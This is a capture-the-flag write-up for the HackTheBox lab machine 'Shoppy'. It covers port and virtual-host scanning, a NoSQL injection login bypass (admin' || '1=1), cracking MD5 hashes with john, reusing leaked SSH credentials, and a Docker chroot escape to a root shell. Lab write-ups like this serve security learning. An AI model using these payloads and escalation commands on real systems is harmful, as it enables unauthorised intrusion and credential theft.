ip: 10.10.11.180
Information Gathering#
Open Ports#
Use nmap
for port scanning
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180
Discovered ports: 22, 80, 9093
Port 80 redirects to http://shoppy.htb
Modify the hosts file and add the resolution
Access http://shoppy.htb/, the homepage is as follows:
Domain Situation#
Since there is a domain, let's see what can be found with virtual host scanning.
gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50
Found a virtual host subdomain
mattermost.shoppy.htb
Add mattermost.shoppy.htb
to the hosts file for resolution.
After accessing it in the browser, the interface is as follows:
Use ffuf to perform sensitive directory and file traversal on shoppy.htb.
.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ
Tested briefly, this login box has no POST link.
When entering admin' or '1'='1
, the program does not respond. Entering admin' || '1=1
can bypass the backend login. This statement is a NoSQL injection statement, so this is a [[NoSQL injection]] login bypass.
Enter the same payload in the search box: admin' || '1=1
View the JSON file, the content is as follows, including the account password, which is encrypted with MD5.
Use [[john]] to crack the hash
john --wordlist=rockyou.txt --format=Raw-MD5 passwd.txt
remembermethisway
Use the cracked password to log in to mattermost.shoppy.htb
Account password:
josh:remembermethisway
The mattermost.shoppy.htb website is a chat program, and many channels have been established in the background. An account password was found in one of the channels, which should be the password for the 10.10.11.180 server. Try to log in via SSH.
username: jaeger
password: Sh0ppyBest@pp!
Found the first flag, user.txt.
By using sudo -l
, you can see the programs that the current user can run as root.
/home/deploy/password-manager
Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
SampleAccess granted! So Sample is the master password, and this program can be used to see the master password.
Found the password for deploy.
username: deploy
password: Deploying@pp!
In the same way, log in to the deploy account via SSH.
Privilege Escalation#
From the chat records in the channel, it can be seen that the server is deployed using Docker.
Use the payload for Docker privilege escalation found on https://gtfobins.github.io/gtfobins/docker/. With Docker, an interactive shell can be obtained.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
After running it, it is a root shell.
Get the flag in the /root directory.
Knowledge Points#
- Information gathering skills
- Virtual host, MD5 password cracking skills
- Privilege escalation skills